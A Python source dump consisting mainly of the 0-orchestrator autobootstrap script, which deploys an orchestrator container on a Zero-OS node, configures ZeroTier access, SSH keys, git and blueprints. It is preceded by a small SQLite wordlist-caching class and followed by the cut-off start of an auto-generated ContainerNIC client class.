def _is_same_version(self, hash: str) -> bool:
"""Javascriptのハッシュと記録しているハッシュを確認し、最新かどうかを判定する.
Args:
hash (str): jsのハッシュ値 (main.[hash].js)
Returns:
bool:
True: 同一
False: 不一致
"""
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
queue = 'SELECT count(version) FROM jsversion'
cnt = cur.execute(queue).fetchone()
if cnt[0] == 0:
return False
queue = 'SELECT version FROM jsversion WHERE id=1'
saved_hash = cur.execute(queue).fetchone()
if saved_hash != hash:
return False
return True
def update_db(self) -> None:
# get new wordlist
js_name: str = self._get_js_name()
if self._is_same_version(js_name):
return
js_url: str = urllib.parse.urljoin(self.__base_url, js_name)
wordlist = self._get_new_wordlist(js_url)
# add to DB
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
cur.execute('DELETE FROM words')
queue = 'INSERT INTO words (word) values (?)'
cur.executemany(queue, map(lambda x: (x,), wordlist["in"]))
queue = 'INSERT INTO jsversion(version) values(?)'
conn.execute(queue, (js_name,))
conn.commit()
def get_version(self) -> str:
"""DBから最新のjsversionを取得する.
Returns:
str: 最新のjsversion
"""
res: str = ''
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
queue = 'SELECT version FROM jsversion WHERE id = (select max(id) from jsversion)'
res = cur.execute(queue).fetchone()[0]
return res.split('.')[1]
``` |
{
"source": "5l1v3r1/0-orchestrator",
"score": 3
} |
#### File: 0-orchestrator/autosetup/autobootstrap.py
```python
import argparse
import subprocess
import requests
import sys
import time
import yaml
import pytoml as toml
from jose import jwt
from urllib.parse import urlparse
from zeroos.orchestrator.sal.Node import Node
from zerotier import client as ztclient
class ZerotierAuthorizer:
def __init__(self, token):
self.client = ztclient.Client()
self.client.set_auth_header("Bearer " + token)
def validate(self, networkid):
try:
x = self.client.network.getNetwork(networkid)
return True
except Exception:
return False
def memberMacAddress(self, memberid, networkid):
"""
This code is a python-port of the code used in the web-ui interface
Found on the web-ui javascript code, it compute the client mac-address
based on client id and network id
"""
n = int(networkid[0:8] or "0", 16)
r = int(networkid[8:16] or "0", 16)
i = 254 & r | 2
if i == 82:
i = 50
o = i << 8 & 65280
while True:
o |= 255 & (int(memberid[0:2], 16) or 0)
o ^= r >> 8 & 255
if len("%04x" % o) == 4:
break
a = int(memberid[2:6], 16)
while True:
a ^= (r >> 16 & 255) << 8
a ^= r >> 24 & 255
if len("%04x" % a) == 4:
break
s = int(memberid[6:10], 16)
while True:
s ^= (255 & n) << 8
s ^= n >> 8 & 255
if len("%04x" % s) == 4:
break
def segment(source):
computed = "%04x" % source
return "%s:%s" % (computed[0:2], computed[2:4])
return "%s:%s:%s" % (segment(o), segment(a), segment(s))
def authorize_node(self, member):
member['config']['authorized'] = True
self.client.network.updateMember(member, member['nodeId'], member['networkId'])
def memberFromMac(self, networkid, hwaddr):
members = self.client.network.listMembers(networkid).json()
for member in members:
usermac = self.memberMacAddress(member['nodeId'], networkid)
if usermac == hwaddr:
return member
return None
def authorize(self, networkid, hwaddr):
netinfo = self.client.network.getNetwork(networkid).json()
netname = netinfo['config']['name']
member = self.memberFromMac(networkid, hwaddr)
if not member:
print("[-] member not found, you should waits for it before")
return None
self.authorize_node(member)
class OrchestratorJWT:
def __init__(self, token):
self.jwt = token
self.data = jwt.get_unverified_claims(token)
def organization(self):
for scope in self.data['scope']:
if scope.startswith('user:memberof:'):
return scope.split(':')[2]
return None
def isValid(self):
try:
jwt._validate_exp(self.jwt)
return True
except Exception:
return False
class OrchestratorSSHTools:
def __init__(self):
pass
def localkeys(self):
"""
returns local ssh public keys available and loaded
"""
process = subprocess.run(["ssh-add", "-L"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# avoid empty agent
if process.returncode != 0:
return ""
return process.stdout
def loadkey(self, filename):
with open(filename, "r") as f:
sshkey = f.read()
return sshkey
def validkey(self, key):
return key.startswith("-----BEGIN RSA PRIVATE KEY-----")
def encryptedkey(self, key):
# this is not enough for new version but already a good point
return (",ENCRYPTED" in key)
class OrchestratorInstallerTools:
def __init__(self):
self.ssh = OrchestratorSSHTools()
def generatetoken(self, clientid, clientsecret, organization=None, validity=None):
params = {
'grant_type': 'client_credentials',
'client_id': clientid,
'client_secret': clientsecret,
'response_type': 'id_token',
'scope': 'offline_access'
}
if validity:
params['validity'] = validity
if organization:
params['scope'] = 'user:memberof:%s,offline_access' % organization
url = 'https://itsyou.online/v1/oauth/access_token'
resp = requests.post(url, params=params)
resp.raise_for_status()
return resp.content.decode('utf8')
def ztstatus(self, cn, macaddr):
"""
Return a zerotier node object from a mac address
"""
ztinfo = cn.client.zerotier.list()
for zt in ztinfo:
if zt['mac'] == macaddr:
return zt
return None
def ztwait(self, cn, macaddr):
while True:
self.progressing()
# get and ensure mac address is there
status = self.ztstatus(cn, macaddr)
if not status:
return None
for addr in status['assignedAddresses']:
# checking for ipv4, rejecting ipv6
if "." in addr:
# network ready, address set
self.progressing(True)
return addr.split('/')[0]
time.sleep(1)
continue
def ztdiscover(self, authorizer, networkid, hwaddr):
while True:
self.progressing()
if authorizer.memberFromMac(networkid, hwaddr):
self.progressing(final=False, step=True)
return True
time.sleep(1)
def containerzt(self, cn, authorizer, nwid=None):
# for all zerotier network, waiting for a valid address
ztinfo = cn.client.zerotier.list()
for ztnet in ztinfo:
# only process specific nwid if provided
if nwid and ztnet['nwid'] != nwid:
continue
print("[+] waiting zerotier access (id: %s, hardware: %s)" % (ztnet['nwid'], ztnet['mac']))
self.progress()
# waiting for client discovered
self.ztdiscover(authorizer, ztnet['nwid'], ztnet['mac'])
# self-authorizing client
authorizer.authorize(ztnet['nwid'], ztnet['mac'])
# waiting for ip-address
return self.ztwait(cn, ztnet['mac'])
def progress(self):
self.xprint("[+] ")
def progressing(self, final=False, step=False):
progression = "." if not step else "+"
if final:
progression = " done\n"
self.xprint(progression)
def xprint(self, content):
sys.stdout.write(content)
sys.stdout.flush()
def hostof(self, upstream):
# attempt ssh/url style
url = urlparse(upstream)
if url.hostname is not None:
return {"host": url.hostname, "port": url.port}
# fallback to git style
# [email protected]:repository
# -> ['git', 'github.com:repository']
# -> ['github.com', 'repository']
hostname = upstream.split("@")[1].split(":")[0]
return {"host": hostname, "port": 22}
def waitsfor(self, cn, command):
self.progress()
while True:
self.progressing()
x = cn.client.bash(command).get()
if x.state == 'SUCCESS':
self.progressing(True)
return True
# waits until it's not done
class OrchestratorInstaller:
def __init__(self):
self.tools = OrchestratorInstallerTools()
self.node = None
self.flist = "https://hub.gig.tech/maxux/0-orchestrator-full-alpha-8.flist"
self.ctname = None
self.core_version = "master"
self.templates = "/opt/code/github/zero-os/0-orchestrator/autosetup/templates"
def connector(self, remote, auth):
"""
remote: remote address of the node
auth: password (jwt token usualy) nfor client
"""
print("[+] contacting zero-os server: %s" % remote)
while True:
try:
node = Node(remote, password=auth)
node.client.timeout = 180
break
except RuntimeError as e:
print("[-] cannot connect server (make sure the server is reachable), retrying")
time.sleep(1)
pass
self.node = node
return node
def prepare(self, ctname, ztnet, ztnetnodes, sshkey, ztauthnodes, ztauth):
"""
node: connected node object
ctname: container name
ztnetwork: zerotier network the container should join
"""
self.ctname = ctname
print("[+] starting orchestrator container")
network = [
{'type': 'default'},
{'type': 'zerotier', 'id': ztnet}
]
if ztnetnodes != ztnet:
network.append({'type': 'zerotier', 'id': ztnetnodes})
env = {
"PATH": "/opt/jumpscale9/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"PYTHONPATH": "/opt/jumpscale9/lib/:/opt/code/github/jumpscale/core9/:/opt/code/github/jumpscale/prefab9/:/opt/code/github/jumpscale/ays9:/opt/code/github/jumpscale/lib9:/opt/code/github/jumpscale/portal9",
"HOME": "/root",
"LC_ALL": "C.UTF-8",
"LC_LANG": "UTF-8"
}
hostvolume = '/var/cache/containers/orchestrator-%s' % ctname
if not self.node.client.filesystem.exists(hostvolume):
self.node.client.filesystem.mkdir(hostvolume)
cn = self.node.containers.create(
name=ctname,
flist=self.flist,
nics=network,
hostname='bootstrap',
mounts={hostvolume: '/optvar'},
env=env
)
print("[+] setting up and starting ssh server")
cn.client.bash('dpkg-reconfigure openssh-server').get()
cn.client.bash('/etc/init.d/ssh start').get()
print("[+] allowing local ssh key")
localkeys = self.tools.ssh.localkeys()
if localkeys != "":
fd = cn.client.filesystem.open("/root/.ssh/authorized_keys", "w")
cn.client.filesystem.write(fd, localkeys)
cn.client.filesystem.close(fd)
else:
print("[-] warning: no local ssh public key found, nothing added")
# make sure the enviroment is also set in bashrc for when ssh is used
print("[+] setting environment variables")
fd = cn.client.filesystem.open("/root/.bashrc", "a")
for k, v in env.items():
export = "export %s=%s\n" % (k, v)
cn.client.filesystem.write(fd, export.encode('utf-8'))
cn.client.filesystem.close(fd)
#
# waiting for zerotier
#
containeraddrs = []
print("[+] configuring zerotier-nodes access")
containeraddrs.append(self.tools.containerzt(cn, ztauthnodes, ztnetnodes))
if ztauth:
print("[+] configuring zerotier-orchestrator access")
containeraddrs.append(self.tools.containerzt(cn, ztauth, ztnet))
#
# install or generate ssh key
#
if sshkey:
print("[+] writing ssh private key")
fd = cn.client.filesystem.open("/root/.ssh/id_rsa", "w")
cn.client.filesystem.write(fd, sshkey.encode('utf-8'))
cn.client.filesystem.close(fd)
# extracting public key from private key
cn.client.bash("chmod 0600 /root/.ssh/id_rsa").get()
cn.client.bash("ssh-keygen -y -f /root/.ssh/id_rsa > /root/.ssh/id_rsa.pub").get()
else:
print("[+] no private ssh key provided, generating new keys")
cn.client.bash("ssh-keygen -f /root/.ssh/id_rsa -t rsa -N ''").get()
publickey = cn.client.bash("cat /root/.ssh/id_rsa.pub").get()
return {'address': containeraddrs, 'publickey': publickey.stdout.strip()}
def configure(self, upstream, email, organization):
"""
upstream: git upstream address of orchestrator repository
email: email address used for git and caddy certificates
organization: organization name ays should allows
"""
print("[+] configuring services")
cn = self.node.containers.get(self.ctname)
#
# configuring ays
#
print("[+] setting organization")
if not cn.client.filesystem.exists("/optvar/cfg"):
cn.client.filesystem.mkdir("/optvar/cfg")
source = cn.client.bash("cat /optvar/cfg/jumpscale9.toml").get()
config = toml.loads(source.stdout)
config['ays'] = {
'production': True,
'oauth': {
'jwt_key': "<KEY>",
'organization': organization,
}
}
fd = cn.client.filesystem.open("/optvar/cfg/jumpscale9.toml", "w")
cn.client.filesystem.write(fd, toml.dumps(config).encode('utf-8'))
cn.client.filesystem.close(fd)
#
# setting up git
#
print("[+] configuring git client")
cn.client.bash("git config --global user.name 'AYS System'").get()
cn.client.bash("git config --global user.email '%s'" % email).get()
#
# setting up upstream
#
print("[+] preparing upstream repository")
cn.client.filesystem.mkdir("/optvar/cockpit_repos")
host = self.tools.hostof(upstream)
print("[+] authorizing %s (port: %d)" % (host['host'], host['port']))
cn.client.bash("ssh-keyscan -p %d %s >> ~/.ssh/known_hosts" % (host['port'], host['host'])).get()
print("[+] cloning upstream repository")
print("[+] (please ensure the host have access (allows public key ?) to upstream repository)")
self.tools.waitsfor(cn, "git clone %s /tmp/upstream" % upstream)
resp = cn.client.bash("cd /tmp/upstream && git rev-parse HEAD").get()
print("[+] configuring upstream repository")
repository = "/optvar/cockpit_repos/orchestrator-server"
# upstream is empty, let create a new repository
if resp.code != 0:
print("[+] git repository is empty, creating empty repository")
cn.client.bash("cd /tmp/upstream/ && git init").get()
cn.client.bash("cd /tmp/upstream/ && git remote add origin %s" % upstream).get()
print("[+] ensure ays repository default layout")
for directory in ["services", "actorTemplates", "actors", "blueprints"]:
target = "/tmp/upstream/%s" % directory
if not cn.client.filesystem.exists(target):
cn.client.bash("mkdir -p %s && touch %s/.keep" % (target, target)).get()
print("[+] commit initialization changes")
cn.client.bash("touch /tmp/upstream/.ays").get()
cn.client.bash("cd /tmp/upstream/ && git add .").get()
cn.client.bash("cd /tmp/upstream/ && git commit -m 'Initial ays commit'").get()
print("[+] moving to orchestrator repository")
# moving upstream to target cockpit repository, removing any previous one
cn.client.bash("rm -rf %s" % repository).get()
cn.client.bash("mv /tmp/upstream %s" % repository).get()
print("[+] pushing git files to upstream")
print("[+] (please ensure the public key is allowed on remote git repository)")
self.tools.waitsfor(cn, "cd %s && git push origin master" % repository)
return True
def blueprint_configuration(self, cluster_token):
"""
cid: iyo-client-id to generate a jwt
csecret: iyo-client-secret to generate a jwt
organization: organization name
stor_org: 0-stor organization root name
stor_ns: 0-stor organization namespace
stor_cid: 0-stor itsyou.online client id
stor_secret: 0-stor itsyou.online client secret
this return the jwt token for ays
"""
cn = self.node.containers.get(self.ctname)
#
# configuration.bp
#
print("[+] building configuration blueprint")
source = cn.client.bash("cat %s/configuration.yaml" % self.templates).get()
config = yaml.load(source.stdout)
# configuring blueprint
for item in config['configuration__main']['configurations']:
if item['key'] == '0-core-version':
item['value'] = self.core_version
if item['key'] == 'jwt-token':
item['value'] = cluster_token
blueprint = "/optvar/cockpit_repos/orchestrator-server/blueprints/configuration.bp"
fd = cn.client.filesystem.open(blueprint, "w")
cn.client.filesystem.write(fd, yaml.dump(config).encode('utf-8'))
cn.client.filesystem.close(fd)
return True
def blueprint_network(self, network, vlan, cidr):
"""
network: network type (g8, switchless, packet)
vlan and cidr: argument for g8 and switchless setup
Note: network value is not verified, please ensure the network passed
is a valid value, if value is not correct, the behavior is unexpected (crash)
"""
cn = self.node.containers.get(self.ctname)
#
# network.bp
#
print("[+] building network blueprint")
targets = {
'g8': 'zero-os',
'switchless': 'switchless'
}
source = cn.client.bash("cat %s/network-%s.yaml" % (self.templates, network)).get()
netconfig = yaml.load(source.stdout)
if network in ['g8', 'switchless']:
key = 'network.%s__storage' % targets[network]
netconfig[key]['vlanTag'] = int(vlan)
netconfig[key]['cidr'] = cidr
if network in ['packet']:
# there is nothing to do, but we keep the code
# to know we _explicitly_ does nothing
pass
blueprint = "/optvar/cockpit_repos/orchestrator-server/blueprints/network.bp"
fd = cn.client.filesystem.open(blueprint, "w")
cn.client.filesystem.write(fd, yaml.dump(netconfig).encode('utf-8'))
cn.client.filesystem.close(fd)
return True
def blueprint_bootstrap(self, znetid, ztoken):
"""
znetid: zerotier netword id of the nodes
ztoken: zerotier token to manage nodes network
"""
cn = self.node.containers.get(self.ctname)
#
# bootstrap.bp
#
print("[+] building bootstrap blueprint")
source = cn.client.bash("cat %s/bootstrap.yaml" % self.templates).get()
bstrapconfig = yaml.load(source.stdout)
bstrapconfig['bootstrap.zero-os__grid1']['zerotierNetID'] = znetid
bstrapconfig['bootstrap.zero-os__grid1']['zerotierToken'] = ztoken
blueprint = "/optvar/cockpit_repos/orchestrator-server/blueprints/bootstrap.bp"
fd = cn.client.filesystem.open(blueprint, "w")
cn.client.filesystem.write(fd, yaml.dump(bstrapconfig).encode('utf-8'))
cn.client.filesystem.close(fd)
return True
def starter(self, email, organization, orchjwt):
jobs = {}
cn = self.node.containers.get(self.ctname)
running = self.running_processes(cn)
if len(running) == 3:
print("[+] all processes already running")
return
if 'ays' not in running:
print("[+] starting ays")
arguments = [
'python3',
'main.py',
'--host 127.0.0.1',
'--port 5000',
'--log info'
]
jobs['ays'] = cn.client.system(" ".join(arguments), dir='/opt/code/github/jumpscale/ays9')
if 'orchestrator' not in running:
print("[+] starting 0-orchestrator")
arguments = [
'/usr/local/bin/orchestratorapiserver',
'--bind localhost:8080',
'--ays-url http://127.0.0.1:5000',
'--ays-repo orchestrator-server',
'--org "%s"' % organization,
'--jwt "%s"' % orchjwt
]
if 'caddy' not in running:
caddyfile = """
:443 {
proxy / localhost:8080
tls self_signed
}
:80 {
proxy / localhost:8080
}
"""
print("[+] starting caddy")
cn.client.filesystem.mkdir('/etc/caddy')
fd = cn.client.filesystem.open("/etc/caddy/Caddyfile", "w")
cn.client.filesystem.write(fd, caddyfile.encode('utf-8'))
cn.client.filesystem.close(fd)
arguments = [
'/usr/local/bin/caddy',
'-agree',
'-email %s' % email,
'-conf /etc/caddy/Caddyfile',
'-quic'
]
jobs['caddy'] = cn.client.system(" ".join(arguments))
print("[+] all processes started")
def deploy(self, jwt):
print("[+] deploying blueprints")
cn = self.node.containers.get(self.ctname)
repository = "/optvar/cockpit_repos/orchestrator-server"
blueprints = ["configuration.bp", "network.bp", "bootstrap.bp"]
environ = {'JWT': jwt}
print("[+] waiting for ays to boot")
status = 'ERROR'
while status != 'SUCCESS':
reply = cn.client.system("ays repo list", env=environ).get()
status = reply.state
print("[+] ays ready, executing blueprints")
for blueprint in blueprints:
print("[+] executing: %s" % blueprint)
x = cn.client.system("ays blueprint %s" % blueprint, dir=repository, env=environ).get()
return True
def running_processes(self, cn):
running = set()
for ps in cn.client.process.list():
if ps['cmdline'].find("caddy") != -1:
running.add('caddy')
if ps['cmdline'].find("orchestratorapiserver") != -1:
running.add('orchestrator')
if ps['cmdline'].find("/opt/jumpscale9/bin/python3 main.py") != -1:
running.add('ays')
return running
def validate(self, ztauthorizer, zt_network):
if not ztauthorizer.validate(zt_network):
print("[-] error: cannot validate zerotier network %s" % zt_network)
print("[-] error: incorrect token provided, abording")
sys.exit(1)
"""
You can just extends this class to implements theses hooks
This will allows you to customize the setup
"""
def pre_prepare(self):
pass
def post_prepare(self):
pass
def pre_configure(self):
pass
def post_configure(self):
pass
def pre_starter(self):
pass
def post_starter(self):
pass
if __name__ == "__main__":
print("[+] ================================")
print("[+] == Zero-OS Orchestrator Setup ==")
print("[+] ================================")
print("[+]")
installer = OrchestratorInstaller()
parser = argparse.ArgumentParser(description='Zero-OS Orchestrator Setup')
parser.add_argument('--host', type=str, help='remote Zero-OS server (address or hostname)', required=True)
parser.add_argument('--host-jwt', type=str, help='(optional) iyo jwt to use to connect the host')
parser.add_argument('--host-iyo-organization', type=str, help='(optional) iyo organization to generate host-jwt')
parser.add_argument('--host-iyo-client-id', type=str, help='(optional) iyo client-id to generate host-jwt')
parser.add_argument('--host-iyo-client-secret', type=str, help='(optional) iyo client-secret to generate host-jwt')
parser.add_argument('--orchestrator-container-flist', type=str, help='containers flist base image')
parser.add_argument('--orchestrator-container-name', type=str, help='container deployment name', default="orchestrator")
parser.add_argument('--orchestrator-iyo-organization', type=str, help='itsyou.online organization of ays', required=True)
parser.add_argument('--orchestrator-zt-net', type=str, help='zerotier network id of the container', required=True)
parser.add_argument('--orchestrator-zt-token', type=str, help='(optional) zerotier api token to auto-authorize orchestrator')
parser.add_argument('--orchestrator-git-repo', type=str, help='remote upstream git address', required=True)
parser.add_argument('--orchestrator-git-email', type=str, help='email used by caddy for certificates (default: <EMAIL>)', default="<EMAIL>")
parser.add_argument('--orchestrator-git-ssh-key', type=str, help='ssh private key filename (need to be passphrase less)')
parser.add_argument('--cluster-jwt', type=str, help='refreshable jwt token with (for orchestrator api)')
parser.add_argument('--cluster-iyo-organization', type=str, help='itsyou.online organization for cluster-jwt generator')
parser.add_argument('--cluster-iyo-client-id', type=str, help='itsyou.online client-id for cluster-jwt generator')
parser.add_argument('--cluster-iyo-client-secret', type=str, help='itsyou.online client-secret for cluster-jwt generator')
parser.add_argument('--cluster-backend-network-type', type=str, help='network type: g8, switchless, packet', required=True)
parser.add_argument('--cluster-backend-network-vlan', type=str, help='g8/switchless only: vlan id')
parser.add_argument('--cluster-backend-network-cidr', type=str, help='g8/switchless only: cidr address')
parser.add_argument('--cluster-management-zt-net', type=str, help='zerotier-network id of the cluster-nodes', required=True)
parser.add_argument('--cluster-management-zt-token', type=str, help='zerotier-token to manage the cluster-nodes', required=True)
parser.add_argument('--dry-run', help='only shows arguments summary, tokens and tests status (no install)', action="store_true")
args = parser.parse_args()
#
# obvious and fast argument checking
#
print("[+] preliminary arguments verification")
if args.orchestrator_container_flist:
installer.flist = args.orchestrator_container_flist
# checking host authentification method provided
host_auth_method = "jwt" if args.host_jwt else "iyo"
if host_auth_method == "iyo":
# jwt is not set, let's check if no iyo is set
if not args.host_iyo_organization and not args.host_iyo_client_id and not args.host_iyo_client_secret:
# no iyo set and no jwt token set
# we assume there is no password protection on host
host_auth_method = "unprotected"
else:
# some iyo argument was given, let's check if he wave all of them
if not args.host_iyo_organization or not args.host_iyo_client_id or not args.host_iyo_client_secret:
print("[-] error: auth: no --host-jwt provided and incomplete --host-iyo-xxx arguments")
print("[-] error: auth: please provide a jwt or all iyo arguments")
sys.exit(1)
# checking cluster authentification method provided
cluster_auth_method = "jwt" if args.cluster_jwt else "iyo"
if cluster_auth_method == "iyo":
# we don't have jwt for cluster so we need to generate it
# checking if we have all required argument for that
if not args.cluster_iyo_organization or not args.cluster_iyo_client_id or not args.cluster_iyo_client_secret:
print("[-] error: auth: no --cluster-jwt provided and incomplete --cluster-iyo-xxx arguments")
print("[-] error: auth: please provide a jwt or all iyo arguments")
sys.exit(1)
# checking cluster backend network validity
if args.cluster_backend_network_type not in ['g8', 'switchless', 'packet']:
print("[-] error: network: invalid network type '%s'" % args.cluster_backend_network_type)
sys.exit(1)
if args.cluster_backend_network_type in ['g8', 'switchless']:
if not args.cluster_backend_network_vlan or not args.cluster_backend_network_cidr:
print("[-] error: network %s: vlan and cird required" % args.cluster_backend_network_type)
sys.exit(1)
# checking upstream ssh key validity if provided
if installer.tools.ssh.localkeys() == "" and not args.orchestrator_git_ssh_key:
print("[-] error: ssh-agent: no keys found on ssh-agent and no ssh private key specified")
print("[-] error: ssh-agent: you need at least one of them")
sys.exit(1)
sshkey = None
if args.orchestrator_git_ssh_key:
sshkey = installer.tools.ssh.loadkey(args.orchestrator_git_ssh_key)
if not installer.tools.ssh.validkey(sshkey):
print("[-] error: ssh-key: invalid ssh key file")
sys.exit(1)
if installer.tools.ssh.encryptedkey(sshkey):
print("[-] error: ssh-key: private key encrypted")
print("[-] error: ssh-key: you need to provided a passphrase-less key")
sys.exit(1)
#
# arguments syntax looks okay, let's show a small summary
#
print("[+]")
print("[+] -- global -----------------------------------------------------")
print("[+] remote server : %s" % args.host)
print("[+] authentification : %s" % host_auth_method)
print("[+] iyo organization : %s" % args.host_iyo_organization)
print("[+] iyo client-id : %s" % args.host_iyo_client_id)
print("[+] iyo client-secret : %s" % ("[ok-hidden]" if args.host_iyo_client_secret else "None"))
print("[+]")
print("[+] -- zerotier ---------------------------------------------------")
print("[+] orchestrator network : %s" % args.orchestrator_zt_net)
print("[+] orchestrator token : %s" % ("[ok-hidden]" if args.orchestrator_zt_token else "None"))
print("[+] cluster nodes network: %s" % args.cluster_management_zt_net)
print("[+] cluster nodes token : %s" % ("[ok-hidden]" if args.cluster_management_zt_token else "None"))
print("[+]")
print("[+] -- orchestrator -----------------------------------------------")
print("[+] container flist url : %s" % installer.flist)
print("[+] container name : %s" % args.orchestrator_container_name)
print("[+] iyo organization : %s" % args.orchestrator_iyo_organization)
print("[+]")
print("[+] -- upstream ---------------------------------------------------")
print("[+] ssh private key : %s" % args.orchestrator_git_ssh_key)
print("[+] upstream git email : %s" % args.orchestrator_git_email)
print("[+] upstream repository : %s" % args.orchestrator_git_repo)
print("[+]")
print("[+] -- cluster ----------------------------------------------------")
print("[+] refreshable jwt : %s" % args.cluster_jwt)
print("[+] iyo organization : %s" % args.cluster_iyo_organization)
print("[+] iyo client-id (jwt) : %s" % args.cluster_iyo_client_id)
print("[+] iyo client-secret : %s" % ("[ok-hidden]" if args.cluster_iyo_client_secret else "None"))
print("[+]")
print("[+] -- network ----------------------------------------------------")
print("[+] backend network set : %s" % args.cluster_backend_network_type)
print("[+] backend vlan-id : %s" % args.cluster_backend_network_vlan)
print("[+] backend address cidr: %s" % args.cluster_backend_network_cidr)
print("[+]")
print("[+] ===============================================================")
print("[+]")
# print("[+] -- notice -----------------------------------------------------")
# print("[-] take some time to review summary")
# print("[+] setup will continue in 5 seconds, press CTRL+C now to cancel")
# time.sleep(5)
#
# now let's validate argument we can validate now
# this will reduce risk of unexpected behavior during deployment
# caused by some incorrect token, credentials or so...
#
print("[+] preliminary checks")
#
# testing zerotier tokens
#
print("[+] checking zerotier token for network: %s" % args.cluster_management_zt_net)
zt_auth_cluster = ZerotierAuthorizer(args.cluster_management_zt_token)
installer.validate(zt_auth_cluster, args.cluster_management_zt_net)
zt_auth_container = None
if args.orchestrator_zt_token:
print("[+] checking zerotier token for network: %s" % args.orchestrator_zt_net)
zt_auth_container = ZerotierAuthorizer(args.orchestrator_zt_token)
installer.validate(zt_auth_container, args.orchestrator_zt_net)
#
# generating jwt tokens if not provided
#
if host_auth_method == "iyo":
print("[+] generating host-jwt based on iyo-arguments")
args.host_jwt = installer.tools.generatetoken(
args.host_iyo_client_id,
args.host_iyo_client_secret,
args.host_iyo_organization,
3600
)
if cluster_auth_method == "iyo":
print("[+] generating cluster-jwt based on iyo-arguments")
args.cluster_jwt = installer.tools.generatetoken(
args.cluster_iyo_client_id,
args.cluster_iyo_client_secret,
args.cluster_iyo_organization,
3600
)
#
# checking validity of the tokens (even if we generated them)
# a jwt can be granted but not contains organization requested
# if the user is not member of the organization, we check now so
# we can avoid error later
#
if args.host_jwt:
print("[+] parsing provided (or generated) host-jwt")
host_jwt = OrchestratorJWT(args.host_jwt)
# did we generated it ourself
if args.host_iyo_organization:
# does the user is part of the organization
if host_jwt.organization() != args.host_iyo_organization:
print("[-] error: host-jwt: user is not part of the organization: %s" % args.host_iyo_organization)
sys.exit(1)
if not host_jwt.isValid():
print("[-] error: host-jwt: token is expired")
sys.exit(1)
print("[+] parsing provided (or generated) cluster-jwt")
cluster_jwt = OrchestratorJWT(args.cluster_jwt)
if cluster_auth_method == "jwt":
# user provided a jwt, extracting organization from it
args.cluster_iyo_organization = cluster_jwt.organization()
# we know that next step will always be true, but let's keep
# the code generic
if cluster_jwt.organization() != args.cluster_iyo_organization:
print("[-] error: cluster-jwt: user is not part of the organization: %s" % args.cluster_iyo_organization)
sys.exit(1)
if not cluster_jwt.isValid():
print("[-] error: host-jwt: token is expired")
sys.exit(1)
print("[+]")
print("[+] -- jwt tokens -------------------------------------------------")
if args.host_jwt:
print("[+] host jwt organization: %s" % host_jwt.organization())
print("[+] cluster jwt organization: %s" % cluster_jwt.organization())
print("[+]")
print("[+] == wouhou ==")
if args.dry_run:
print("[+] everything looks correct, you asked a dry-run, nothing more do do")
sys.exit(0)
print("[+] everything looks correct, let's go installing all of this !")
print("[+]")
#
# everything looks fine for now
# starting the real deployment
#
print("[+] initializing connection")
node = installer.connector(args.host, args.host_jwt)
print("[+] hook: pre-prepare")
installer.pre_prepare()
print("[+] hook: prepare")
prepared = installer.prepare(
args.orchestrator_container_name,
args.orchestrator_zt_net,
args.cluster_management_zt_net,
sshkey,
zt_auth_cluster,
zt_auth_container
)
print("[+] ==================================================")
print("[+] container address: %s" % prepared['address'])
print("[+] container key: %s" % prepared['publickey'])
print("[+] ==================================================")
print("[+] hook: post-prepare")
installer.post_prepare()
print("[+] hook: pre-configure")
installer.pre_configure()
print("[+] hook: configure")
installer.configure(
args.orchestrator_git_repo,
args.orchestrator_git_email,
args.cluster_iyo_organization
)
installer.blueprint_configuration(args.cluster_jwt)
installer.blueprint_network(
args.cluster_backend_network_type,
args.cluster_backend_network_vlan,
args.cluster_backend_network_cidr
)
installer.blueprint_bootstrap(
args.cluster_management_zt_net,
args.cluster_management_zt_token
)
print("[+] hook: post-configure")
installer.post_configure()
print("[+] hook: pre-starter")
installer.pre_starter()
print("[+] hook: starter")
installer.starter(
args.orchestrator_git_email,
args.orchestrator_iyo_organization,
args.cluster_jwt
)
installer.deploy(args.cluster_jwt)
print("[+] hook: post-starter")
installer.post_starter()
print("[+] orchestrator deployed, have a nice day")
```
#### File: orchestrator/client/ContainerNIC.py
```python
from .ContainerNICconfig import ContainerNICconfig
from .EnumContainerNICStatus import EnumContainerNICStatus
from .EnumContainerNICType import EnumContainerNICType
from . import client_support
class ContainerNIC(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(id, status, type, config=None, hwaddr=None, name=None, token=None):
"""
:type config: ContainerNICconfig
:type hwaddr: str
:type id: str
:type name: str
:type status: EnumContainerNICStatus
:type token: str
:type type: EnumContainerNICType
:rtype: ContainerNIC
"""
return ContainerNIC(
config=config,
hwaddr=hwaddr,
id=id,
name=name,
status=status,
token=token,
type=type,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'ContainerNIC'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'config'
val = data.get(property_name)
if val is not None:
datatypes = [ContainerNICconfig]
try:
self.config = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
property_name = 'hwaddr'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.hwaddr = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
property_name = 'id'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.id = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'name'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.name = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
property_name = 'status'
val = data.get(property_name)
if val is not None:
datatypes = [EnumContainerNICStatus]
try:
self.status = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'token'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.token = client_support.val_factory(val, datatypes)
except ValueError as err:
